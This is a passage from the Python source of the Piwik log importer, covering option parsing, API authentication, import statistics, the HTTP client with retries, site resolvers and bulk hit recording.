"--regex-group-to-page-cvar=\"win32_status=Windows Status Code\" will track the sc-win32-status IIS field "
"in the 'Windows Status Code' custom variable. Regexes must contain a named group."
)
option_parser.add_option(
'--title-category-delimiter', dest='title_category_delimiter', default='/',
help="If --enable-http-errors is used, errors are shown in the page titles report. If you have "
"changed General.action_title_category_delimiter in your Piwik configuration, you need to set this "
"option to the same value in order to get a pretty page titles report."
)
option_parser.add_option(
'--dump-log-regex', dest='dump_log_regex', action='store_true', default=False,
help="Prints out the regex string used to parse log lines and exists. Can be useful for using formats "
"in newer versions of the script in older versions of the script. The output regex can be used with "
"the --log-format-regex option."
)
option_parser.add_option(
'--ignore-groups', dest='regex_groups_to_ignore', default=None,
help="Comma separated list of regex groups to ignore when parsing log lines. Can be used to, for example, "
"disable normal user id tracking. See documentation for --log-format-regex for list of available "
"regex groups."
)
option_parser.add_option(
'--regex-group-to-visit-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_visit_cvars_map'), type='string',
help="Track an attribute through a custom variable with visit scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-visit-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--regex-group-to-page-cvar', action='callback', callback=functools.partial(self._set_option_map, 'regex_group_to_page_cvars_map'), type='string',
help="Track an attribute through a custom variable with page scope instead of through Piwik's normal "
"approach. For example, to track usernames as a custom variable instead of through the uid tracking "
"parameter, supply --regex-group-to-page-cvar=\"userid=User Name\". This will track usernames in a "
"custom variable named 'User Name'. The list of available regex groups can be found in the documentation "
"for --log-format-regex (additional regex groups you may have defined "
"in --log-format-regex can also be used)."
)
option_parser.add_option(
'--track-http-method', dest='track_http_method', default=False,
help="Enables tracking of http method as custom page variable if method group is available in log format."
)
option_parser.add_option(
'--retry-max-attempts', dest='max_attempts', default=PIWIK_DEFAULT_MAX_ATTEMPTS, type='int',
help="The maximum number of times to retry a failed tracking request."
)
option_parser.add_option(
'--retry-delay', dest='delay_after_failure', default=PIWIK_DEFAULT_DELAY_AFTER_FAILURE, type='int',
help="The number of seconds to wait before retrying a failed tracking request."
)
option_parser.add_option(
'--request-timeout', dest='request_timeout', default=DEFAULT_SOCKET_TIMEOUT, type='int',
help="The maximum number of seconds to wait before terminating an HTTP request to Piwik."
)
option_parser.add_option(
'--include-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'include_host'),
help="Only import logs from the specified host(s)."
)
option_parser.add_option(
'--exclude-host', action='callback', type='string', callback=functools.partial(self._add_to_array, 'exclude_host'),
help="Only import logs that are not from the specified host(s)."
)
option_parser.add_option(
'--exclude-older-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_older_than'),
help="Ignore logs older than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--exclude-newer-than', action='callback', type='string', default=None, callback=functools.partial(self._set_date, 'exclude_newer_than'),
help="Ignore logs newer than the specified date. Exclusive. Date format must be YYYY-MM-DD hh:mm:ss +/-0000. The timezone offset is required."
)
option_parser.add_option(
'--accept-invalid-ssl-certificate',
dest='accept_invalid_ssl_certificate', action='store_true',
default=False,
help="Do not verify the SSL / TLS certificate when contacting the Piwik server. This is the default when running on Python 2.7.8 or older."
)
return option_parser
def _set_date(self, option_attr_name, option, opt_str, value, parser):
try:
(date_str, timezone) = value.rsplit(' ', 1)
except:
fatal_error("Invalid date value '%s'." % value)
if not re.match('[-+][0-9]{4}', timezone):
fatal_error("Invalid date value '%s': expected valid timzeone like +0100 or -1200, got '%s'" % (value, timezone))
timezone = float(timezone)
date = datetime.datetime.strptime(date_str, '%Y-%m-%d %H:%M:%S')
date -= datetime.timedelta(hours=timezone/100)
setattr(parser.values, option_attr_name, date)
def _add_to_array(self, option_attr_name, option, opt_str, value, parser):
if not hasattr(parser.values, option_attr_name) or not getattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, [])
getattr(parser.values, option_attr_name).append(value)
def _set_option_map(self, option_attr_name, option, opt_str, value, parser):
"""
Sets a key-value mapping in a dict that is built from command line options. Options that map
string keys to string values (like --w3c-map-field) can set the callback to a bound partial
of this method to handle the option.
"""
parts = value.split('=')
if len(parts) != 2:
fatal_error("Invalid %s option: '%s'" % (opt_str, value))
key, value = parts
if not hasattr(parser.values, option_attr_name):
setattr(parser.values, option_attr_name, {})
getattr(parser.values, option_attr_name)[key] = value
def _parse_args(self, option_parser):
"""
Parse the command line args and create self.options and self.filenames.
"""
self.options, self.filenames = option_parser.parse_args(sys.argv[1:])
if self.options.output:
sys.stdout = sys.stderr = open(self.options.output, 'a+', 0)
if not self.filenames:
print(option_parser.format_help())
sys.exit(1)
# Configure logging before calling logging.{debug,info}.
logging.basicConfig(
format='%(asctime)s: [%(levelname)s] %(message)s',
level=logging.DEBUG if self.options.debug >= 1 else logging.INFO,
)
self.options.excluded_useragents = set([s.lower() for s in self.options.excluded_useragents])
if self.options.exclude_path_from:
paths = [path.strip() for path in open(self.options.exclude_path_from).readlines()]
self.options.excluded_paths.extend(path for path in paths if len(path) > 0)
if self.options.excluded_paths:
self.options.excluded_paths = set(self.options.excluded_paths)
logging.debug('Excluded paths: %s', ' '.join(self.options.excluded_paths))
if self.options.include_path_from:
paths = [path.strip() for path in open(self.options.include_path_from).readlines()]
self.options.included_paths.extend(path for path in paths if len(path) > 0)
if self.options.included_paths:
self.options.included_paths = set(self.options.included_paths)
logging.debug('Included paths: %s', ' '.join(self.options.included_paths))
if self.options.hostnames:
logging.debug('Accepted hostnames: %s', ', '.join(self.options.hostnames))
else:
logging.debug('Accepted hostnames: all')
if self.options.log_format_regex:
self.format = RegexFormat('custom', self.options.log_format_regex, self.options.log_date_format)
elif self.options.log_format_name:
try:
self.format = FORMATS[self.options.log_format_name]
except KeyError:
fatal_error('invalid log format: %s' % self.options.log_format_name)
else:
self.format = None
if not hasattr(self.options, 'custom_w3c_fields'):
self.options.custom_w3c_fields = {}
elif self.format is not None:
# validate custom field mappings
for custom_name, default_name in self.options.custom_w3c_fields.iteritems():
if default_name not in type(format).fields:
fatal_error("custom W3C field mapping error: don't know how to parse and use the '%' field" % default_name)
return
if not hasattr(self.options, 'regex_group_to_visit_cvars_map'):
self.options.regex_group_to_visit_cvars_map = {}
if not hasattr(self.options, 'regex_group_to_page_cvars_map'):
self.options.regex_group_to_page_cvars_map = {}
if not hasattr(self.options, 'w3c_field_regexes'):
self.options.w3c_field_regexes = {}
else:
# make sure each custom w3c field regex has a named group
for field_name, field_regex in self.options.w3c_field_regexes.iteritems():
if '(?P<' not in field_regex:
fatal_error("cannot find named group in custom w3c field regex '%s' for field '%s'" % (field_regex, field_name))
return
if not self.options.piwik_url:
fatal_error('no URL given for Piwik')
if not (self.options.piwik_url.startswith('http://') or self.options.piwik_url.startswith('https://')):
self.options.piwik_url = 'http://' + self.options.piwik_url
logging.debug('Piwik Tracker API URL is: %s', self.options.piwik_url)
if not self.options.piwik_api_url:
self.options.piwik_api_url = self.options.piwik_url
if not (self.options.piwik_api_url.startswith('http://') or self.options.piwik_api_url.startswith('https://')):
self.options.piwik_api_url = 'http://' + self.options.piwik_api_url
logging.debug('Piwik Analytics API URL is: %s', self.options.piwik_api_url)
if self.options.recorders < 1:
self.options.recorders = 1
download_extensions = DOWNLOAD_EXTENSIONS
if self.options.download_extensions:
download_extensions = set(self.options.download_extensions.split(','))
if self.options.extra_download_extensions:
download_extensions.update(self.options.extra_download_extensions.split(','))
self.options.download_extensions = download_extensions
if self.options.regex_groups_to_ignore:
self.options.regex_groups_to_ignore = set(self.options.regex_groups_to_ignore.split(','))
def __init__(self):
self._parse_args(self._create_parser())
def _get_token_auth(self):
"""
If the token auth is not specified in the options, get it from Piwik.
"""
# Get superuser login/password from the options.
logging.debug('No token-auth specified')
if self.options.login and self.options.password:
piwik_login = self.options.login
piwik_password = hashlib.md5(self.options.password).hexdigest()
logging.debug('Using credentials: (login = %s, password = %s)', piwik_login, piwik_password)
try:
api_result = piwik.call_api('UsersManager.getTokenAuth',
userLogin=piwik_login,
md5Password=piwik_password,
_token_auth='',
_url=self.options.piwik_api_url,
)
except urllib2.URLError as e:
fatal_error('error when fetching token_auth from the API: %s' % e)
try:
return api_result['value']
except KeyError:
# Happens when the credentials are invalid.
message = api_result.get('message')
fatal_error(
'error fetching authentication token token_auth%s' % (
': %s' % message if message else '')
)
else:
# Fallback to the given (or default) configuration file, then
# get the token from the API.
logging.debug(
'No credentials specified, reading them from "%s"',
self.options.config_file,
)
config_file = ConfigParser.RawConfigParser()
success = len(config_file.read(self.options.config_file)) > 0
if not success:
fatal_error(
"the configuration file" + self.options.config_file + " could not be read. Please check permission. This file must be readable by the user running this script to get the authentication token"
)
updatetokenfile = os.path.abspath(
os.path.join(os.path.dirname(__file__),
'../../misc/cron/updatetoken.php'),
)
phpBinary = 'php'
is_windows = sys.platform.startswith('win')
if is_windows:
try:
processWin = subprocess.Popen('where php.exe', stdout=subprocess.PIPE, stderr=subprocess.PIPE)
[stdout, stderr] = processWin.communicate()
if processWin.returncode == 0:
phpBinary = stdout.strip()
else:
fatal_error("We couldn't detect PHP. It might help to add your php.exe to the path or alternatively run the importer using the --login and --password option")
except:
fatal_error("We couldn't detect PHP. You can run the importer using the --login and --password option to fix this issue")
command = [phpBinary, updatetokenfile]
if self.options.enable_testmode:
command.append('--testmode')
hostname = urlparse.urlparse( self.options.piwik_url ).hostname
command.append('--piwik-domain=' + hostname )
command = subprocess.list2cmdline(command)
# logging.debug(command);
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
[stdout, stderr] = process.communicate()
if process.returncode != 0:
fatal_error("`" + command + "` failed with error: " + stderr + ".\nReponse code was: " + str(process.returncode) + ". You can alternatively run the importer using the --login and --password option")
filename = stdout
credentials = open(filename, 'r').readline()
credentials = credentials.split('\t')
return credentials[1]
def get_resolver(self):
if self.options.site_id:
logging.debug('Resolver: static')
return StaticResolver(self.options.site_id)
else:
logging.debug('Resolver: dynamic')
return DynamicResolver()
def init_token_auth(self):
if not self.options.piwik_token_auth:
try:
self.options.piwik_token_auth = self._get_token_auth()
except Piwik.Error as e:
fatal_error(e)
logging.debug('Authentication token token_auth is: %s', self.options.piwik_token_auth)
class Statistics(object):
"""
Store statistics about parsed logs and recorded entries.
Can optionally print statistics on standard output every second.
"""
class Counter(object):
"""
Simple integers cannot be used by multithreaded programs. See:
http://stackoverflow.com/questions/6320107/are-python-ints-thread-safe
"""
def __init__(self):
# itertools.count's implementation in C does not release the GIL and
# therefore is thread-safe.
self.counter = itertools.count(1)
self.value = 0
def increment(self):
self.value = self.counter.next()
def advance(self, n):
for i in range(n):
self.increment()
def __str__(self):
return str(int(self.value))
def __init__(self):
self.time_start = None
self.time_stop = None
self.piwik_sites = set() # sites ID
self.piwik_sites_created = [] # (hostname, site ID)
self.piwik_sites_ignored = set() # hostname
self.count_lines_parsed = self.Counter()
self.count_lines_recorded = self.Counter()
# requests that the Piwik tracker considered invalid (or failed to track)
self.invalid_lines = []
# Do not match the regexp.
self.count_lines_invalid = self.Counter()
# Were filtered out.
self.count_lines_filtered = self.Counter()
# No site ID found by the resolver.
self.count_lines_no_site = self.Counter()
# Hostname filtered by config.options.hostnames
self.count_lines_hostname_skipped = self.Counter()
# Static files.
self.count_lines_static = self.Counter()
# Ignored user-agents.
self.count_lines_skipped_user_agent = self.Counter()
# Ignored HTTP erors.
self.count_lines_skipped_http_errors = self.Counter()
# Ignored HTTP redirects.
self.count_lines_skipped_http_redirects = self.Counter()
# Downloads
self.count_lines_downloads = self.Counter()
# Ignored downloads when --download-extensions is used
self.count_lines_skipped_downloads = self.Counter()
# Misc
self.dates_recorded = set()
self.monitor_stop = False
def set_time_start(self):
self.time_start = time.time()
def set_time_stop(self):
self.time_stop = time.time()
def _compute_speed(self, value, start, end):
delta_time = end - start
if value == 0:
return 0
if delta_time == 0:
return 'very high!'
else:
return value / delta_time
def _round_value(self, value, base=100):
return round(value * base) / base
def _indent_text(self, lines, level=1):
"""
Return an indented text. 'lines' can be a list of lines or a single
line (as a string). One level of indentation is 4 spaces.
"""
prefix = ' ' * (4 * level)
if isinstance(lines, basestring):
return prefix + lines
else:
return '\n'.join(
prefix + line
for line in lines
)
def print_summary(self):
invalid_lines_summary = ''
if self.invalid_lines:
invalid_lines_summary = '''Invalid log lines
-----------------
The following lines were not tracked by Piwik, either due to a malformed tracker request or error in the tracker:
%s
''' % textwrap.fill(", ".join(self.invalid_lines), 80)
print('''
%(invalid_lines)sLogs import summary
-------------------
%(count_lines_recorded)d requests imported successfully
%(count_lines_downloads)d requests were downloads
%(total_lines_ignored)d requests ignored:
%(count_lines_skipped_http_errors)d HTTP errors
%(count_lines_skipped_http_redirects)d HTTP redirects
%(count_lines_invalid)d invalid log lines
%(count_lines_filtered)d filtered log lines
%(count_lines_no_site)d requests did not match any known site
%(count_lines_hostname_skipped)d requests did not match any --hostname
%(count_lines_skipped_user_agent)d requests done by bots, search engines...
%(count_lines_static)d requests to static resources (css, js, images, ico, ttf...)
%(count_lines_skipped_downloads)d requests to file downloads did not match any --download-extensions
Website import summary
----------------------
%(count_lines_recorded)d requests imported to %(total_sites)d sites
%(total_sites_existing)d sites already existed
%(total_sites_created)d sites were created:
%(sites_created)s
%(total_sites_ignored)d distinct hostnames did not match any existing site:
%(sites_ignored)s
%(sites_ignored_tips)s
Performance summary
-------------------
Total time: %(total_time)d seconds
Requests imported per second: %(speed_recording)s requests per second
Processing your log data
------------------------
In order for your logs to be processed by Piwik, you may need to run the following command:
./console core:archive --force-all-websites --force-all-periods=315576000 --force-date-last-n=1000 --url='%(url)s'
''' % {
'count_lines_recorded': self.count_lines_recorded.value,
'count_lines_downloads': self.count_lines_downloads.value,
'total_lines_ignored': sum([
self.count_lines_invalid.value,
self.count_lines_filtered.value,
self.count_lines_skipped_user_agent.value,
self.count_lines_skipped_http_errors.value,
self.count_lines_skipped_http_redirects.value,
self.count_lines_static.value,
self.count_lines_skipped_downloads.value,
self.count_lines_no_site.value,
self.count_lines_hostname_skipped.value,
]),
'count_lines_invalid': self.count_lines_invalid.value,
'count_lines_filtered': self.count_lines_filtered.value,
'count_lines_skipped_user_agent': self.count_lines_skipped_user_agent.value,
'count_lines_skipped_http_errors': self.count_lines_skipped_http_errors.value,
'count_lines_skipped_http_redirects': self.count_lines_skipped_http_redirects.value,
'count_lines_static': self.count_lines_static.value,
'count_lines_skipped_downloads': self.count_lines_skipped_downloads.value,
'count_lines_no_site': self.count_lines_no_site.value,
'count_lines_hostname_skipped': self.count_lines_hostname_skipped.value,
'total_sites': len(self.piwik_sites),
'total_sites_existing': len(self.piwik_sites - set(site_id for hostname, site_id in self.piwik_sites_created)),
'total_sites_created': len(self.piwik_sites_created),
'sites_created': self._indent_text(
['%s (ID: %d)' % (hostname, site_id) for hostname, site_id in self.piwik_sites_created],
level=3,
),
'total_sites_ignored': len(self.piwik_sites_ignored),
'sites_ignored': self._indent_text(
self.piwik_sites_ignored, level=3,
),
'sites_ignored_tips': '''
TIPs:
- if one of these hosts is an alias host for one of the websites
in Piwik, you can add this host as an "Alias URL" in Settings > Websites.
- use --add-sites-new-hosts if you wish to automatically create
one website for each of these hosts in Piwik rather than discarding
these requests.
- use --idsite-fallback to force all these log lines with a new hostname
to be recorded in a specific idsite (for example for troubleshooting/visualizing the data)
- use --idsite to force all lines in the specified log files
to be all recorded in the specified idsite
- or you can also manually create a new Website in Piwik with the URL set to this hostname
''' if self.piwik_sites_ignored else '',
'total_time': self.time_stop - self.time_start,
'speed_recording': self._round_value(self._compute_speed(
self.count_lines_recorded.value,
self.time_start, self.time_stop,
)),
'url': config.options.piwik_api_url,
'invalid_lines': invalid_lines_summary
})
##
## The monitor is a thread that prints a short summary each second.
##
def _monitor(self):
latest_total_recorded = 0
while not self.monitor_stop:
current_total = stats.count_lines_recorded.value
time_elapsed = time.time() - self.time_start
print('%d lines parsed, %d lines recorded, %d records/sec (avg), %d records/sec (current)' % (
stats.count_lines_parsed.value,
current_total,
current_total / time_elapsed if time_elapsed != 0 else 0,
(current_total - latest_total_recorded) / config.options.show_progress_delay,
))
latest_total_recorded = current_total
time.sleep(config.options.show_progress_delay)
def start_monitor(self):
t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def stop_monitor(self):
self.monitor_stop = True
class Piwik(object):
"""
Make requests to Piwik.
"""
class Error(Exception):
def __init__(self, message, code = None):
super(Exception, self).__init__(message)
self.code = code
class RedirectHandlerWithLogging(urllib2.HTTPRedirectHandler):
"""
Special implementation of HTTPRedirectHandler that logs redirects in debug mode
to help users debug system issues.
"""
def redirect_request(self, req, fp, code, msg, hdrs, newurl):
logging.debug("Request redirected (code: %s) to '%s'" % (code, newurl))
return urllib2.HTTPRedirectHandler.redirect_request(self, req, fp, code, msg, hdrs, newurl)
@staticmethod
def _call(path, args, headers=None, url=None, data=None):
"""
Make a request to the Piwik site. It is up to the caller to format
arguments, to embed authentication, etc.
"""
if url is None:
url = config.options.piwik_url
headers = headers or {}
if data is None:
# If Content-Type isn't defined, PHP do not parse the request's body.
headers['Content-type'] = 'application/x-www-form-urlencoded'
data = urllib.urlencode(args)
elif not isinstance(data, basestring) and headers['Content-type'] == 'application/json':
data = json.dumps(data)
if args:
path = path + '?' + urllib.urlencode(args)
headers['User-Agent'] = 'Piwik/LogImport'
try:
timeout = config.options.request_timeout
except:
timeout = None # the config global object may not be created at this point
request = urllib2.Request(url + path, data, headers)
# Handle basic auth if auth_user set
try:
auth_user = config.options.auth_user
auth_password = config.options.auth_password
except:
auth_user = None
auth_password = None
if auth_user is not None:
base64string = base64.encodestring('%s:%s' % (auth_user, auth_password)).replace('\n', '')
request.add_header("Authorization", "Basic %s" % base64string)
# Use non-default SSL context if invalid certificates shall be
# accepted.
if config.options.accept_invalid_ssl_certificate and \
sys.version_info >= (2, 7, 9):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False
ssl_context.verify_mode = ssl.CERT_NONE
https_handler_args = {'context': ssl_context}
else:
https_handler_args = {}
opener = urllib2.build_opener(
Piwik.RedirectHandlerWithLogging(),
urllib2.HTTPSHandler(**https_handler_args))
response = opener.open(request, timeout = timeout)
result = response.read()
response.close()
return result
@staticmethod
def _call_api(method, **kwargs):
"""
Make a request to the Piwik API taking care of authentication, body
formatting, etc.
"""
args = {
'module' : 'API',
'format' : 'json2',
'method' : method,
'filter_limit' : '-1',
}
# token_auth, by default, is taken from config.
token_auth = kwargs.pop('_token_auth', None)
if token_auth is None:
token_auth = config.options.piwik_token_auth
if token_auth:
args['token_auth'] = token_auth
url = kwargs.pop('_url', None)
if url is None:
url = config.options.piwik_api_url
if kwargs:
args.update(kwargs)
# Convert lists into appropriate format.
# See: http://developer.piwik.org/api-reference/reporting-api#passing-an-array-of-data-as-a-parameter
# Warning: we have to pass the parameters in order: foo[0], foo[1], foo[2]
# and not foo[1], foo[0], foo[2] (it will break Piwik otherwise.)
final_args = []
for key, value in args.iteritems():
if isinstance(value, (list, tuple)):
for index, obj in enumerate(value):
final_args.append(('%s[%d]' % (key, index), obj))
else:
final_args.append((key, value))
# logging.debug('%s' % final_args)
# logging.debug('%s' % url)
res = Piwik._call('/', final_args, url=url)
try:
return json.loads(res)
except ValueError:
raise urllib2.URLError('Piwik returned an invalid response: ' + res)
@staticmethod
def _call_wrapper(func, expected_response, on_failure, *args, **kwargs):
"""
Try to make requests to Piwik at most PIWIK_FAILURE_MAX_RETRY times.
"""
errors = 0
while True:
try:
response = func(*args, **kwargs)
if expected_response is not None and response != expected_response:
if on_failure is not None:
error_message = on_failure(response, kwargs.get('data'))
else:
error_message = "didn't receive the expected response. Response was %s " % response
raise urllib2.URLError(error_message)
return response
except (urllib2.URLError, httplib.HTTPException, ValueError, socket.timeout) as e:
logging.info('Error when connecting to Piwik: %s', e)
code = None
if isinstance(e, urllib2.HTTPError):
# See Python issue 13211.
message = 'HTTP Error %s %s' % (e.code, e.msg)
code = e.code
elif isinstance(e, urllib2.URLError):
message = e.reason
else:
message = str(e)
# decorate message w/ HTTP response, if it can be retrieved
if hasattr(e, 'read'):
message = message + ", response: " + e.read()
try:
delay_after_failure = config.options.delay_after_failure
max_attempts = config.options.max_attempts
except NameError:
delay_after_failure = PIWIK_DEFAULT_DELAY_AFTER_FAILURE
max_attempts = PIWIK_DEFAULT_MAX_ATTEMPTS
errors += 1
if errors == max_attempts:
logging.info("Max number of attempts reached, server is unreachable!")
raise Piwik.Error(message, code)
else:
logging.info("Retrying request, attempt number %d" % (errors + 1))
time.sleep(delay_after_failure)
@classmethod
def call(cls, path, args, expected_content=None, headers=None, data=None, on_failure=None):
return cls._call_wrapper(cls._call, expected_content, on_failure, path, args, headers,
data=data)
@classmethod
def call_api(cls, method, **kwargs):
return cls._call_wrapper(cls._call_api, None, None, method, **kwargs)
##
## Resolvers.
##
## A resolver is a class that turns a hostname into a Piwik site ID.
##
class StaticResolver(object):
"""
Always return the same site ID, specified in the configuration.
"""
def __init__(self, site_id):
self.site_id = site_id
# Go get the main URL
site = piwik.call_api(
'SitesManager.getSiteFromId', idSite=self.site_id
)
if site.get('result') == 'error':
fatal_error(
"cannot get the main URL of this site: %s" % site.get('message')
)
self._main_url = site['main_url']
stats.piwik_sites.add(self.site_id)
def resolve(self, hit):
return (self.site_id, self._main_url)
def check_format(self, format):
pass
class DynamicResolver(object):
"""
Use Piwik API to determine the site ID.
"""
_add_site_lock = threading.Lock()
def __init__(self):
self._cache = {}
if config.options.replay_tracking:
# get existing sites
self._cache['sites'] = piwik.call_api('SitesManager.getAllSites')
def _get_site_id_from_hit_host(self, hit):
return piwik.call_api(
'SitesManager.getSitesIdFromSiteUrl',
url=hit.host,
)
def _add_site(self, hit):
main_url = 'http://' + hit.host
DynamicResolver._add_site_lock.acquire()
try:
# After we obtain the lock, make sure the site hasn't already been created.
res = self._get_site_id_from_hit_host(hit)
if res:
return res[0]['idsite']
# The site doesn't exist.
logging.debug('No Piwik site found for the hostname: %s', hit.host)
if config.options.site_id_fallback is not None:
logging.debug('Using default site for hostname: %s', hit.host)
return config.options.site_id_fallback
elif config.options.add_sites_new_hosts:
if config.options.dry_run:
# Let's just return a fake ID.
return 0
logging.debug('Creating a Piwik site for hostname %s', hit.host)
result = piwik.call_api(
'SitesManager.addSite',
siteName=hit.host,
urls=[main_url],
)
if result.get('result') == 'error':
logging.error("Couldn't create a Piwik site for host %s: %s",
hit.host, result.get('message'),
)
return None
else:
site_id = result['value']
stats.piwik_sites_created.append((hit.host, site_id))
return site_id
else:
# The site doesn't exist, we don't want to create new sites and
# there's no default site ID. We thus have to ignore this hit.
return None
finally:
DynamicResolver._add_site_lock.release()
def _resolve(self, hit):
res = self._get_site_id_from_hit_host(hit)
if res:
# The site already exists.
site_id = res[0]['idsite']
else:
site_id = self._add_site(hit)
if site_id is not None:
stats.piwik_sites.add(site_id)
return site_id
def _resolve_when_replay_tracking(self, hit):
"""
If parsed site ID found in the _cache['sites'] return site ID and main_url,
otherwise return (None, None) tuple.
"""
site_id = hit.args['idsite']
if site_id in self._cache['sites']:
stats.piwik_sites.add(site_id)
return (site_id, self._cache['sites'][site_id]['main_url'])
else:
return (None, None)
def _resolve_by_host(self, hit):
"""
Returns the site ID and site URL for a hit based on the hostname.
"""
try:
site_id = self._cache[hit.host]
except KeyError:
logging.debug(
'Site ID for hostname %s not in cache', hit.host
)
site_id = self._resolve(hit)
logging.debug('Site ID for hostname %s: %s', hit.host, site_id)
self._cache[hit.host] = site_id
return (site_id, 'http://' + hit.host)
def resolve(self, hit):
"""
Return the site ID from the cache if found, otherwise call _resolve.
If replay_tracking option is enabled, call _resolve_when_replay_tracking.
"""
if config.options.replay_tracking:
# We only consider requests with piwik.php which don't need host to be imported
return self._resolve_when_replay_tracking(hit)
else:
# Workaround for empty Host bug issue #126
if hit.host.strip() == '':
hit.host = 'no-hostname-found-in-log'
return self._resolve_by_host(hit)
def check_format(self, format):
if config.options.replay_tracking:
pass
elif format.regex is not None and 'host' not in format.regex.groupindex and not config.options.log_hostname:
fatal_error(
"the selected log format doesn't include the hostname: you must "
"specify the Piwik site ID with the --idsite argument"
)
class Recorder(object):
"""
A Recorder fetches hits from the Queue and inserts them into Piwik using
the API.
"""
recorders = []
def __init__(self):
self.queue = Queue.Queue(maxsize=2)
# if bulk tracking disabled, make sure we can store hits outside of the Queue
if not config.options.use_bulk_tracking:
self.unrecorded_hits = []
@classmethod
def launch(cls, recorder_count):
"""
Launch a bunch of Recorder objects in a separate thread.
"""
for i in xrange(recorder_count):
recorder = Recorder()
cls.recorders.append(recorder)
run = recorder._run_bulk if config.options.use_bulk_tracking else recorder._run_single
t = threading.Thread(target=run)
t.daemon = True
t.start()
logging.debug('Launched recorder')
@classmethod
def add_hits(cls, all_hits):
"""
Add a set of hits to the recorders queue.
"""
# Organize hits so that one client IP will always use the same queue.
# We have to do this so visits from the same IP will be added in the right order.
hits_by_client = [[] for r in cls.recorders]
for hit in all_hits:
hits_by_client[hit.get_visitor_id_hash() % len(cls.recorders)].append(hit)
for i, recorder in enumerate(cls.recorders):
recorder.queue.put(hits_by_client[i])
@classmethod
def wait_empty(cls):
"""
Wait until all recorders have an empty queue.
"""
for recorder in cls.recorders:
recorder._wait_empty()
def _run_bulk(self):
while True:
try:
hits = self.queue.get()
except:
# TODO: we should log something here, however when this happens, logging.etc will throw
return
if len(hits) > 0:
try:
self._record_hits(hits)
except Piwik.Error as e:
fatal_error(e, hits[0].filename, hits[0].lineno) # approximate location of error
self.queue.task_done()
def _run_single(self):
while True:
if config.options.force_one_action_interval != False:
time.sleep(config.options.force_one_action_interval)
if len(self.unrecorded_hits) > 0:
hit = self.unrecorded_hits.pop(0)
try:
self._record_hits([hit])
except Piwik.Error as e:
fatal_error(e, hit.filename, hit.lineno)
else:
self.unrecorded_hits = self.queue.get()
self.queue.task_done()
def _wait_empty(self):
"""
Wait until the queue is empty.
"""
while True:
if self.queue.empty():
# We still have to wait for the last queue item being processed
# (queue.empty() returns True before queue.task_done() is
# called).
self.queue.join()
return
time.sleep(1)
def date_to_piwik(self, date):
date, time = date.isoformat(sep=' ').split()
return '%s %s' % (date, time.replace('-', ':'))
def _get_hit_args(self, hit):
"""
Returns the args used in tracking a hit, without the token_auth.
"""
site_id, main_url = resolver.resolve(hit)
if site_id is None:
# This hit doesn't match any known Piwik site.
if config.options.replay_tracking:
stats.piwik_sites_ignored.add('unrecognized site ID %s' % hit.args.get('idsite'))
else:
stats.piwik_sites_ignored.add(hit.host)
stats.count_lines_no_site.increment()
return
stats.dates_recorded.add(hit.date.date())
path = hit.path
if hit.query_string and not config.options.strip_query_string:
path += config.options.query_string_delimiter + hit.query_string
# only prepend main url / host if it's a path
url_prefix = self._get_host_with_protocol(hit.host, main_url) if hasattr(hit, 'host') else main_url
url = (url_prefix if path.startswith('/') else '') + path[:1024]
# handle custom variables before generating args dict
if config.options.enable_bots:
if hit.is_robot:
hit.add_visit_custom_var("Bot", hit.user_agent)
else:
hit.add_visit_custom_var("Not-Bot", hit.user_agent)
hit.add_page_custom_var("HTTP-code", hit.status)
args = {
'rec': '1',
'apiv': '1',
'url': url.encode('utf8'),
'urlref': hit.referrer[:1024].encode('utf8'),
'cip': hit.ip,
'cdt': self.date_to_piwik(hit.date),
'idsite': site_id,
'dp': '0' if config.options.reverse_dns else '1',
'ua': hit.user_agent.encode('utf8')
}
if config.options.replay_tracking:
# prevent request to be force recorded when option replay-tracking
args['rec'] = '0'
# idsite is already determined by resolver
if 'idsite' in hit.args:
del hit.args['idsite']
args.update(hit.args)
if hit.is_download:
args['download'] = args['url']
if config.options.enable_bots:
args['bots'] = '1'
if hit.is_error or hit.is_redirect:
args['action_name'] = '%s%sURL = %s%s' % (
hit.status,
config.options.title_category_delimiter,
urllib.quote(args['url'], ''),
("%sFrom = %s" % (
config.options.title_category_delimiter,
urllib.quote(args['urlref'], '')
) if args['urlref'] != '' else '')
)
if hit.generation_time_milli > 0:
args['gt_ms'] = int(hit.generation_time_milli)
if hit.event_category and hit.event_action:
args['e_c'] = hit.event_category
args['e_a'] = hit.event_action
if hit.event_name:
args['e_n'] = hit.event_name
if hit.length:
args['bw_bytes'] = hit.length
# convert custom variable args to JSON
if 'cvar' in args and not isinstance(args['cvar'], basestring):
args['cvar'] = json.dumps(args['cvar'])
if '_cvar' in args and not isinstance(args['_cvar'], basestring):
args['_cvar'] = json.dumps(args['_cvar'])
return args
def _get_host_with_protocol(self, host, main_url):
if '://' not in host:
parts = urlparse.urlparse(main_url)
host = parts.scheme + '://' + host
return host
def _record_hits(self, hits):
"""
Inserts several hits into Piwik.
"""
if not config.options.dry_run:
data = {
'token_auth': config.options.piwik_token_auth,
'requests': [self._get_hit_args(hit) for hit in hits]
}
try:
args = {}
if config.options.debug_tracker:
args['debug'] = '1'
response = piwik.call(
'/piwik.php', args=args,
expected_content=None,
headers={'Content-type': 'application/json'},
data=data,
on_failure=self._on_tracking_failure
)
if config.options.debug_tracker:
logging.debug('tracker response:\n%s' % response)
# check for invalid requests
try:
response = json.loads(response)
except:
logging.info("bulk tracking returned invalid JSON")
# don't display the tracker response if we're debugging the tracker.
# debug tracker output will always break the normal JSON output.
if not config.options.debug_tracker:
logging.info("tracker response:\n%s" % response)
response = {}
if ('invalid_indices' in response and isinstance(response['invalid_indices'], list) and
response['invalid_indices']):
invalid_count = len(response['invalid_indices'])
invalid_lines = [str(hits[index].lineno) for index in response['invalid_indices']]
